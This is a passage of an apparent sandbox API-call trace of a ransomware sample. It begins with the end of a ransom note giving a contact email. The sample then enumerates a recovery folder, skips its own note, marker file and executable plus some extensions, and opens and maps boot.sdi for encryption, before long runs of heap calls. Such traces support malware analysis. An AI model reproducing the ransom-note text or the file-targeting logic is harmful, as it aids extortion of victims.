tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0038.435] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x74c) returned 0xc85e78 [0038.436] CloseHandle (hObject=0x2a4) returned 1 [0038.436] GetLastError () returned 0x0 [0038.436] lstrlenW (lpString="Z:\\Recovery\\WindowsRE") returned 21 [0038.436] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0038.436] FindFirstFileW (in: lpFileName="Z:\\Recovery\\WindowsRE\\*", lpFindFileData=0x2fae118 | out: lpFindFileData=0x2fae118*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7bbb2a38, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0038.436] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.436] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0038.436] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0038.436] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0038.436] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x2fae118 | out: lpFindFileData=0x2fae118*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7bbb2a38, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.436] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.436] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0038.436] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0038.436] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0038.436] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0038.436] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x2fae118 | out: lpFindFileData=0x2fae118*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7bbb2a38, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7bbb2a38, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7bbb2a38, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="")) returned 1 [0038.436] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.436] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0038.436] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x2fae118 | out: lpFindFileData=0x2fae118*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x21ce881b, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21ce881b, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x39762934, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2="Tiger4444.exe") returned -1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2=".") returned 1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2="..") returned 1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2="windows") returned -1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2="bootmgr") returned -1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2="pagefile.sys") returned -1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2="boot") returned 1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2="ids.txt") returned -1 [0038.436] lstrcmpiW (lpString1="boot.sdi", lpString2="NTUSER.DAT") returned -1 [0038.436] lstrcpyW (in: lpString1=0x2faec94, lpString2="boot.sdi" | out: lpString1="boot.sdi") returned="boot.sdi" [0038.436] SetFileAttributesW (lpFileName="Z:\\Recovery\\WindowsRE\\boot.sdi", dwFileAttributes=0x2002) returned 1 [0038.437] lstrlenW (lpString="boot.sdi") returned 8 [0038.437] lstrlenW (lpString="Tiger4444") returned 9 [0038.437] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0038.437] lstrlenW (lpString=".dll") returned 4 [0038.437] lstrcmpiW (lpString1=".sdi", lpString2=".dll") returned 1 [0038.437] lstrlenW (lpString=".lnk") returned 4 [0038.437] lstrcmpiW (lpString1=".sdi", lpString2=".lnk") returned 1 [0038.437] lstrlenW (lpString=".ini") returned 4 [0038.437] lstrcmpiW (lpString1=".sdi", lpString2=".ini") returned 1 [0038.437] lstrlenW (lpString=".sys") returned 4 [0038.437] lstrcmpiW (lpString1=".sdi", lpString2=".sys") returned -1 [0038.437] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "z:\\recovery\\windowsre\\boot.sdi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a8 [0038.437] QueryPerformanceFrequency (in: lpFrequency=0x2fac0e8 | out: lpFrequency=0x2fac0e8*=100000000) returned 1 [0038.437] QueryPerformanceCounter (in: lpPerformanceCount=0x2fac0f0 | out: lpPerformanceCount=0x2fac0f0*=12989013154) returned 1 [0038.437] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2fac148 | out: lpFileSize=0x2fac148*=3170304) returned 1 [0038.437] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc765e8 [0038.437] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0038.437] CreateFileMappingW (hFile=0x2a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x306300, lpName=0x0) returned 0x2b8 [0038.438] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x106300) returned 0x30b0000 [0038.841] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3260000 [0039.005] UnmapViewOfFile (lpBaseAddress=0x3260000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc7d140 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0039.027] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc75308 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc89de8 [0039.027] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc8c2d0 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc7d350 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20c) returned 0xc8c4e0 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73d50 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0039.027] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d350 | out: hHeap=0xc50000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc8c6f8 [0039.027] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73df8 [0039.027] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0039.027] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0039.027] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0039.027] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc75a68 [0039.027] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73df8 | out: hHeap=0xc50000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc8c908 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0039.028] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0039.028] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75388 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0039.029] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0039.029] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75388 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0039.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0039.030] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap 